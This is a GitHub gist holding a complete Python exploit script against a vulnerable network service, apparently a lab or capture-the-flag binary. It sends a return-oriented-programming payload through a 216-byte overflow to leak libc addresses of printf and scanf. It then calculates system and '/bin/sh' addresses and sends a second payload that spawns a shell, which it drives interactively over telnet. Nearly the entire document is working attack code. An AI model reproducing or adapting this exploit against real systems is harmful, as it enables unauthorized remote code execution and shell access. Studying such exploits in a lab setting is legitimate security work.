Last active
April 15, 2020 00:54
-
-
Save ShivamShrirao/92d3005685f1309c6d1f4d2eb139b739 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from telnetlib import Telnet | |
import socket | |
import sys | |
TARGET = ("192.168.43.115",5555) # Target IP and PORT | |
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket | |
p64 = lambda x: pack("Q",x) # To Convert to little endian | |
u64 = lambda x: unpack("Q",x)[0] # Convert leaked bytes to address. | |
def checkTerms(term,payload): # function to check for any bad chars in payload. | |
if term in payload: | |
print("Found",hex(ord(term)),"in payload, exit.") | |
sys.exit(0) # exit if there are bad chars in payload. | |
start = 0x400530 | |
printf_plt = 0x400500 | |
printf_got = 0x601018 | |
scanf_got = 0x601028 | |
perc_s = 0x400758 | |
pop_rdi = 0x400723 | |
pop_rsi_r15 = 0x400721 | |
buf = b'A'*216 # payload in bytes form for python3 to send through socket. | |
buf+= p64(pop_rdi) | |
buf+= p64(perc_s) # goes to rdi | |
buf+= p64(pop_rsi_r15) | |
buf+= p64(printf_got) # goes to rsi | |
buf+= p64(printf_got) # goes to r15 | |
buf+= p64(printf_plt) | |
buf+= p64(pop_rdi) | |
buf+= p64(perc_s) # goes to rdi | |
buf+= p64(pop_rsi_r15) | |
buf+= p64(scanf_got) # goes to rsi | |
buf+= p64(scanf_got) # goes to r15 | |
buf+= p64(printf_plt) | |
buf+= p64(start) # start the program again. | |
checkTerms(b'\n',buf) # newline is a bad char if between payload. | |
buf+= b'\n' # add new line at end to enter input. | |
checkTerms(b'\x20',buf) # whitespace is a bad char. | |
print("[i] Payload ready.") | |
s.connect(TARGET) # connect to target server | |
print(s.recv(1024)) | |
s.send(buf) # send payload | |
print("[i] Payload sent.") | |
resp=s.recv(1024) # receive response. | |
print("[i] Reply received.") | |
print(resp) | |
leaks = resp.split(b"received.")[1] # just split reponse to find addreses | |
printf_libc = u64(leaks[:6].ljust(8,b'\x00')) # pad with null bytes as address should be of 8 bytes | |
scanf_libc = u64(leaks[6:12].ljust(8,b'\x00')) | |
print("[*] Leaked libc printf:\t\t",hex(printf_libc)) | |
print("[*] Leaked libc __isoc99_scanf:\t",hex(scanf_libc)) | |
printf_libc_off = 0x064e80 | |
libc_base = printf_libc - printf_libc_off # calculate libc base address. | |
print("[*] Calculated libc base:\t",hex(libc_base)) | |
system = libc_base + 0x04f440 # system offset | |
bin_sh = libc_base + 0x1b3e9a # str_bin_sh offset | |
ret = 0x400661 # ret instruction gadget in binary. | |
buf = b'B'*216 # junk | |
buf+= p64(ret) # execute 'ret' to make stack 16 bytes aligned by popping off 8 bytes off top of stack and returning to it. | |
buf+= p64(pop_rdi) | |
buf+= p64(bin_sh) # goes to rdi | |
buf+= p64(system) # call system | |
checkTerms(b'\n',buf) # newline is a bad char if between payload. | |
buf+= b'\n' # add new line at end to enter input. | |
checkTerms(b'\x20',buf) # whitespace is a bad char | |
print("[i] Shell payload ready.") | |
s.send(buf) # send payload | |
print("[i] Payload sent.") | |
t=Telnet() # make a telnet object | |
t.sock=s # assign our socket to Telnet | |
t.write(b'\nuname -a\nid\n') # Enter some commands | |
print("[i] Attempting interactive shell.") | |
try: | |
t.interact() # interactive telnet shell. | |
except UnicodeDecodeError: | |
print("ERRRR") | |
print(s.recv(1024)) | |
t.interact() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment